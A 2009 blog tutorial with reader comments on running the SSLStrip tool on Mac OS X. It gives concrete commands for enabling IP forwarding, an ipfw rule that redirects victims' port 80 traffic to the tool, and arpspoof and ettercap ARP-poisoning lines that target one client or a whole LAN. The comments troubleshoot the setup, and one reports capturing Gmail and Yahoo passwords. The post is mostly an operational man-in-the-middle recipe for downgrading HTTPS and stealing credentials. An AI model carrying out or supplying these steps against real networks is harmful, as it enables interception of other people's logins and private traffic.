Monday, May 4, 2009

SSL Strip on Mac OS X

After playing around with SSL Strip for a while on BackTrack 4, I decided on trying to get it up and running on my MacBook. It turns out it was actually quite easy!

First thing, is to download the SSL Strip package from Moxie Marlinspike's homepage. You can grab it from the link above.

Next, if you're using MacPorts Python 2.5, like I am, you'll need to:

sudo port install py25-socket-ssl

The MacPorts Python 2.5 port maintainer decided to split the ssl sockets modules up into a different package for some reason, so you'll need to add it as shown.

Now, you'll need to make sure your Mac is configured to do ip forwarding and make sure that the ip firewall is enabled. Use the following commands to do so:

sysctl net.inet.ip.forwarding
sysctl net.inet.ip.fw.enable


If either of those are diabled, set them like so:

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.enable=1


Now, your system should be set for ip forwarding and applying firewall rules.

The firewall rules can now be modified to forward all port 80 traffic to the port which SSL Strip will listen on. If you want to listen on 1234, for example, the following ipfw command will set you up:

ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

The add fwd 127.0.0.1,1234 part tells ipfw to add a new rule for forwarding traffic to 127.0.0.1 on port 1234. The rest of the command is the logic which will be used to match the traffic which needs to be forwarded. The tcp obviously specifies that it will match on only TCP traffic. from not me to any makes it so that it will match any traffic which is being sent from any address other than your IP to any other IP address. If you instead use any to any I found that SSL Strip's traffic will get redirected to itself, which will cause problems. Finally, the 80 specifies that only TCP traffic destined for the HTTP port will be forwarded.

Finally, with that rule set up, all that needs to be done is to run SSL Strip.python sslstrip.py -h shows the following options:

sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.


So, the basic python sslstrip.py -l 1234 should get you started.

The kill session and favicon options are handy, so those are worth checking out. Also, the -a option is handy if you need to debug things or just want a dump of all traffic which is running through the proxy.

I think that's about it for all the configuring. Running and parsing the results of SSL Strip is something I'm sure you all can figure out.

Let me know if any of the above steps don't work for you. Otherwise, happy hacking, don't do anything mean and as usual, have fun!


Update 05/18/2009 -
After seeing Ivan's question, I realized I didn't provide anything on how to convince people to connect through you instead of the default gateway. Oops! Well, here's the rest:

I used arpspoof when setting up sslstrip for the first time because I'm more used to it and I also find it easier to target individual clients. Also, I think it reduces my chances of breaking connectivity on the entire LAN if my ipfw config was off.

So, what I did in my initial testing was:

arpspoof -i en1 -t 192.168.1.101 192.168.1.1

Where en1 is my Mac's AirPort adapter, 192.168.1.101 is the client I'm attempting to MITM and 192.168.1.1 is the address I'm spoofing which is the default gateway for my LAN.

I didn't use ettercap with sslstrip, but if I remember my ettercap correctly, you can use it to attack an entire LAN like so:

ettercap -i en1 -Tq -M arp /192.168.1.1/ // -P autoadd

In this example, -Tq enables just the console interface in quiet mode, -M arp instructs ettercap to use ARP poisoning for doing the MITM, /192.168.1.1/ // instructs it to poison all connections between the gateway and any other hosts on the LAN. Finally, the -P autoadd enables the autoadd plugin so that new hosts are poisoned upon connecting to the LAN. You may need to use -M arp:remote which enables ettercap to sniff remote connections, but I think you'll be fine without.

Hope this helps!

61 comments:

  1. Hi thanks, it was very useful. Just one question:
    Did you use arpspoof or ettercap??

    ReplyDelete
  2. Hey, Ivan. I'm glad you found it useful!

    I'm surprised I forgot to explain how I went about setting up the MITM! I updated my post above so check it out for the juicy ARP details.

    Cheers!

    ReplyDelete
  3. Thanks for the great article, really helped :)

    ReplyDelete
  4. Again Thanks i read an article where they used ettercap but i like your reason about usinf arpspoof :D

    ReplyDelete
  5. Great write up.

    Is it ok to leave the "ipfw add fwd" and ip forwarding on after you are done, or should you remove to cleanup.

    ReplyDelete
  6. Re: "Is it ok to leave the "ipfw add fwd" and ip forwarding on after you are done, or should you remove to cleanup."

    That's an excellent question! You can actually leave it as-is and you should be fine. The 'from not me to any' part of the rule ensures that the only traffic which is forwarded are packets where the source IP is something other than your own.

    Unless you use the OS X machine as a router or you are using some kind of arp, dhcp, dns spoofing etc. your firewall should not be seeing any traffic other than your own.

    The only thing I can think of is that there may be a tiny bit of a performance impact from having additional unused firewall rules. However, unless your machine has an amazingly high amount of IP traffic, I doubt that you'll even notice any impact even if there is one.

    ReplyDelete
  7. Thanks for this tutorial.
    It helped me a lot!

    ReplyDelete
  8. Nice i will try this later on 10.6.2

    ReplyDelete
  9. Thanks for the article man it was nice and helpful, but i have 2 questions:
    1- when i use ssl strip with python 2.6 it gives me:
    DeprecationWarning: the md5 module is deprecated; use hashlib instead ?
    2- ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80 the target stop browsing until i remove the rule. i'm using snow, arpspoof.

    ReplyDelete
  10. I haven't been able to get ip forwarding to work on snowleopard. Ryan, have you figured this out?

    ReplyDelete
  11. sudo sysctl -w net.inet.ip.forwarding=1 this is how i worked it out

    ReplyDelete
  12. Amazing, on snow Leopard, ipfw forward doesn't work.. and seems that I'm not the only person that have this issue this http://tinyurl.com/y9gcacw is another...

    ReplyDelete
  13. After doing some digging around the interwebs, it does seem like several people are having problems getting forwarding to work with ipfw on Snow Leopard. Unfortunately, I don't have a copy on my MacBook (I know, I've been lazy). I will try to do some digging and also get a copy of Snow Leopard soon. It is strange that this seems to be broken on Snow Leopard...

    ReplyDelete
  14. This is another confirmation that many people have problem with ipfw fwd on Snow Leopard http://tinyurl.com/yj9eu2h

    ReplyDelete
  15. This is actually not a stupid post... Strange that it was done by a mac user.

    If only all mac users were as smart as you, it would be less annoying that they are all so stuck up.

    Also: for all your forwarding troubles you could make your own program pretty easily using pcap and c++
    OR
    use the fragrouter port: fragrouter -B1

    Make sure you disable kernel ip forwarding. Or you could use ettercap, it has built in forwarding (and also a packet filter which rules)

    ReplyDelete
  16. Hehe, I'm glad that I was able to surprise you with my non-stuck up Mac knowledge. I'm definitely not a typical Mac user... the reason I use one is because is that it's actually a great hacker's platform. Don't get me wrong, Linux rocks, and will always be my #1 OS, but Mac hardware together with OS X makes an amazing computer for day to day use. I normally have a BackTrack laptop I use for serious business, but sometimes I just like to be able to hack around on my Mac, and I think the fact that it can do these types of things is pretty awesome.

    ReplyDelete
  17. Hey Ryan, I did everything as you described here and everything seemed to go as it should, but once I start arpspoof and run sslstrip, if I try to browse the internet in the target machine it becomes unresponsive. Could you help me out? THanks.

    ReplyDelete
  18. hey there, how did you manage to install the twisted module?

    ReplyDelete
  19. For twisted: sudo easy_install twisted, also used easy_install for the ssl libraries.

    i have no luck with the transparant proxy on 10.6 either do. Anyone got that working?

    ReplyDelete
  20. Hey everyone, I finally got around to playing with the latest version of SSL Strip.

    @Brus, you can either install twisted using easy_install or with MacPorts. The port name is py26-twisted-web2 (or py25 if you're using python 2.5, for example).

    As far as the ipfw troubles, I tried finding a solution all weekend long and couldn't come up with anything. I tried using both forwarding and divert without any success. Everything I read seems to indicate that ipfw forwarding is just plain broken on Snow Leopard. Apple doesn't seem to care about ipfw at all anymore.

    I will try to keep digging into this the next couple days. If anyone else has figured something out with ipfw, please let me know. Otherwise, we'll have to go outside of what is supplied by the OS and use ettercap or fragrouter as was previously suggested.

    ReplyDelete
  21. @Ryan - I have no luck with ettercap either as the MITM attacks it uses require the same IPFW config sslstrip needs. I also tried to pay around with filters hoping to get things going but did not managed. The last part might simply be me. That was my first attempt writing a filter :-P

    ReplyDelete
  22. OK - i looked at this a bit more. Testing my ipfw rules with a netcat listener and figured out that it`s not how IPFW behave that causes the issue on Mac OS 10.6. It's how the socket behave instead! If you have packet comming in with the destination of the IP of the interface, it's fine. The FWD rule works!

    Ex:

    - ipfw add fwd 127.0.0.1,1234 tcp from any to any 80
    - nc -l -p 1234

    trying to connect to the IP of that machine on port 80 will let us establish a socket but sending a forged SYN will never yeild a reply... even if i manage to send the packet directly on 1234 to bypass IPFW. Looks like the INADDR_ANY sockets are broken :-(

    Some other people are having this issue: http://lists.apple.com/archives/Darwin-dev/2009/Nov/msg00002.html

    Now if we could figure a work around or what Apple is doing about it that would be nice!

    -- Sorry for spaming your blogs / comments

    ReplyDelete
  23. Any news on this IPFW issue?

    It is impossible for me to install fragrouter and arpspoof(dsniff) or ettercap. One port depends on libnet and the other on libnet11. Both cannot be installed...

    ReplyDelete
  24. @stix

    I've not made any progress on the IPFW issues. I tried using both fragrouter and ettercap, but neither seem to be able to do what I want. I tried writing an ettercap filter, but could not make it work. Perhaps a full-blown ettercap plugin could do it.

    As far as your build problems go, I'd ry the dsniff-devel package instead. That one should use libnet11 rather then libnet. Also, I'd install ettercap-ng instead of the regular old ettercap.

    ReplyDelete
  25. @Ryan I saw your articles and replies.... Is any solution for IPFW?

    ReplyDelete
  26. Unfortunately, there doesn't seem to be any solution yet. If you need to use this on a mac, the easiest way is probably just to run backtrack in a VM or set up a dual boot...

    ReplyDelete
  27. @Ryan Thank you for your kind reply. I hope this problem will be fixed soon. Because I love my Macbook ^^;

    Have a nice day~!

    ReplyDelete
  28. Solution is:

    sudo sysctl -w net.inet.ip.scopedroute=0

    Ciaooo,
    Simone

    ReplyDelete
  29. Hi Ryan, cracking original post, any comment on Simones suggestion of sudo sysctl -w net.inet.ip.scopedroute=0?

    Would really like to get this working and hitting brick walls all over the place!

    Nick

    ReplyDelete
  30. One Question, I tried it with my two computers and it worked like charm but after a few minutes the internet connection is not possible anymore (on both computers). After killing the arpspoof everything works again.
    Any suggestions?
    thanks

    ps for everyone who has issues regarding the libnet / libnet11 dep. just use two different ports (fink and macport for example)

    ReplyDelete
  31. Im using a Pineapple from Hak5 with Karma, wired to my mac book with the ether port IP set as the default gateway. I then set Internet Sharing from my internet connection (wifi) to the ether port. Target connects to the Pineapple, routes through the Mac and out on to the web, cracking! I can then Wireshark the ether port and capture traffic. Trouble is, I want SSLStrip in the middle and am having a darned job getting it to work. Any ideas would be great.

    Nick

    ReplyDelete
  32. @Volker I'm not sure what might be happening with the connection. I have no idea why killing arpspoof would resolve the problem either. I'd check your Console Logs to see if there is anything suspicious in there...

    @Nick It sounds like a pretty nice setup you have there! I would actaully start by disabling Internet Sharing. If you run

    sudo sysctl -w net.inet.ip.forwarding=1
    sudo sysctl -w net.inet.ip.fw.enable=1

    that should both enable the firewall and enable forwarding. This will effectively replace the Internet Sharing option. You will probably want to try Simone's tip of running:

    sudo sysctl -w net.inet.ip.scopedroute=0

    I have not yet tried that last one, by the way, so I don't know if it fixes the routing problem entirely.

    Once you have those all set, all that is left is to set up the redirect for SSLStrip. Run the ipfw commands in the post above and that should set up the SSLStrip forward. Unless I'm missing something, I believe that will be all you need to get up and running.

    Let me know how it goes!

    ReplyDelete
  33. Thanks for the response. Interesting. OK, as briefly as possible. I've got twisted and ssl installed, SSLStrip installed fine. All sysctl and ipfw commands ran cleanly. SSLStrip runs without error.

    Sadly, without Internet Sharing (IS) running, no bananas!

    Now, with IS running, all is fine but once the ipfw command was run, my target has remained connected, I can still ping, skype is still up but all port 80 traffic falls into a black hole. No browsing.

    Running SSLStrip makes no difference, Firefox on the target reports that the connection as timed out.

    I would suggest that the forwarding is doing what it should but something bad is happening with IS on.

    Sat here with puzzled expression and an open box of jelly babies. Without some fairly swift assistance there is the danger I will polish off the box!

    Nick

    ReplyDelete
  34. ps. if I remove the ipfw rule all is good again

    ReplyDelete
  35. Sorry mate dominating your forum here :(

    Very interesting, OSX Internet Sharing is just a GUI for IPFW - who knew!! When I turn on IS, it just adds:-

    00010 773000 609196156 divert 8668 ip from any to any via en2

    This strikes me as a good thing - maybe? Essentially if we can manipulate the IPFW rules to still allow the sharing on en2 but pop by port 1234 on the way.

    I'd never looked at an IPFW command before yesterday so uphill slope is the order of the morning. Jelly babies going down!

    Nick

    ReplyDelete
  36. Hi Ryan,

    as far as I know now it has something to do with the key renewal. So every few minutes WPA2 does the key renewal and thats why the arpspoof don´t work anymore.
    So the big question is how to deal with that. Any ideas?
    btw does someone has similar issues?

    Volker

    ReplyDelete
  37. I think I found a fix for snow leopard. This works for me. YMMV.

    $ sudo ipfw add fwd 127.0.0.1,1234 tcp from any to any dst-port 80 recv en1

    ReplyDelete
  38. Ryan thanks for your post!
    to resolve to "forwarding" problem under Snow Leopard:

    sysctl -w net.inet.ip.scopedroute=0
    (default is 1)

    then the packet forwarding works great for me.

    ReplyDelete
  39. Hi friends,

    i've tried almost all the combinations possible with ipfw rules
    (each one at a time)

    ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

    ipfw add fwd 127.0.0.1,1234 tcp from any to any dst-port 80 recv en1

    and the sysctl options

    sysctl -w net.inet.ip.forwarding=1
    sysctl -w net.inet.ip.fw.enable=1

    sysctl -w net.inet.ip.scopedroute=0

    but no success, when a fire up ssltrip and the ipfw rule, victim
    loses access to http at all.

    What am i doing wrong?
    Is there a receipt for get this working correctly?

    Thanx

    ReplyDelete
  40. Maybe this is a long shot, since this is so old. But I'm having an issue with the port forwarding part. I have it working on my linux computer which is annoying cause I want it to work on my macbook as well.
    I'm using ettercap with MitM and am trying to change HTTPS to HTTP, which I am able to do on the linux with IPTABLES, but when I use IPFW I can't get the same effect, the browser of the attacked computer just stops and won't load the page. Do you know anything about the differences between IPFW and IPTABLES and could help me?

    ReplyDelete
  41. OH MY GOD. Two posts up answered my question. wow.


    sysctl -w net.inet.ip.scopedroute=0

    Geez :facepalm:

    ReplyDelete
  42. python sslstrip.py -h
    /opt/local/Library/Frameworks/Python.framework/Versions/2.5/Resources/Python.app/Contents/MacOS/Python: can't open file 'sslstrip.py': [Errno 2] No such file or directory

    i know this is old but i can't think of what to do. i run this on BT4 all the time but i'm at a loss

    ReplyDelete
  43. Just found this page since I had the same problems running sslstrip on snow leopard and I solved it by adding sslstrip and arpspoof to the Firewall Layer Application authorization list. Maybe this can help some of you.

    However I know face another problem. I'm know able to sniff passwords but the whole process prevent the login of the user. I've tested it on yahoo and gmail. I get the password of my tests accounts but the browser switch back to the gmail or yahoo login page. I don't know if its snow leopard specific or not.

    ReplyDelete
  44. I am literally banging my head on the desk with this one, I can do trouble shooting, but this is ridiculous. Does anyone have any insight into the fact that no matter what you do, victims get cut off from HTTP access?

    ReplyDelete
  45. Any news ? I spent a lot of time on this problem and did not get any result

    ReplyDelete
  46. It seems I'm getting better result when specifying only one target eg // /192.168.0.10/ . Don't know why.

    ReplyDelete
  47. Hi, im using this but with Ettercap-ng because i want to see the LOGINS right away instead and i just feel it is much simplier and feels more right.

    Here is the commands i use in MAC OS X "lastest"

    sudo sysctl -w net.inet.ip.forwarding=1
    sudo sysctl -w net.inet.ip.fw.verbose=1
    sudo sysctl -w net.inet.ip.scopedroute=0

    sudo sslstrip -l 8080
    sudo ipfw add fwd 127.0.0.1,8080 log tcp from not me to any 80

    sudo ettercap -C <-- Terminal UI Based, Scan for Hosts, Host File: Add target 1 and 2 gateway.. MITM: remote -> Then start sniffing.

    You have forgot to tell people to:
    sudo sysctl -w net.inet.ip.scopedroute=0 <-- that´s realy important.

    Thanks for the great tutorial btw.

    ReplyDelete
  48. Things changed in Lion.

    Using Xcode v4.1
    all works great, except the command:

    sysctl -w net.inet.ip.scopedroute=0

    that now returns:

    sysctl: oid 'net.inet.ip.scopedroute' is read only

    Is there any solution or someone who made sslstrip works in Lion?

    ReplyDelete
  49. You can set scopedroute to 0 on boot somehow. Forgot how exactly, but you just add the above to a file... (not very helpful, i'm sorry!)

    I still couldn't get SSLStrip to work on Lion though. Not sure why. I think it might have something to do with ettercap's sniffer. I'll try running it with the -o flag and see if that lets packets reach SSL strip.

    ReplyDelete
  50. I have done some research on this as well. It appears that you are unable to set the scopedroute to 0 in OS X Lion. I have attempted to edit a certain file that will set scopedroute to 0 as the kernel boots up however I have been unsuccessful in my efforts. If anyone can get anywhere with this please respond I'd love to get this working!

    ReplyDelete
  51. The fix is here

    https://github.com/thatha/sshuttle/blob/macos_10_7_only_hack/README.md

    ReplyDelete
    Replies
    1. Hi , How is that supposed to be the fix ? can you provide us with more informations here ? Thanks

      Delete
  52. Have anyone found the solution for the SSL with Lion ? I didn't find the previous link that helpful , any help would be highly appreciated .

    ReplyDelete
  53. Run as root


    rm /Library/Preferences/SystemConfiguration/com.apple.Boot.plist.lockfile

    echo 'Kernel Flagsnet.inet.ip.scopedroute=0' > /Library/Preferences/SystemConfiguration/com.apple.Boot.plist

    Then reboot and check:

    sysctl -a | grep bootargs

    sysctl -a | grep net.inet.ip.scopedroute


    Source: https://groups.google.com/forum/?fromgroups#!topic/sshuttle/pCUFyjPh3oA

    ReplyDelete
    Replies
    1. Formatting error

      disregard the post and scroll to the bottom of the source for the correct commands

      Delete
  54. I am having a slight problem. I got up to

    ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80
    Except replaced with my information I get

    ipfw: socket: Operation not permitte

    ReplyDelete
  55. 10.9 Mavericks with the same problem:
    "ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80
    Except replaced with my information I get

    ipfw: socket: Operation not permitted"

    ReplyDelete
    Replies
    1. easy. Just type sudo before the command

      Delete
    2. as a start, if anything says permission denied, put a sudo in front

      Delete
    3. hello, nice article. Everything went well with me until i inputed the command "ipfw add fwd 127.0.0.1,8080 tcp from not me to any 80" it returns the error ipfw command not found. Pls how do i go from here

      Delete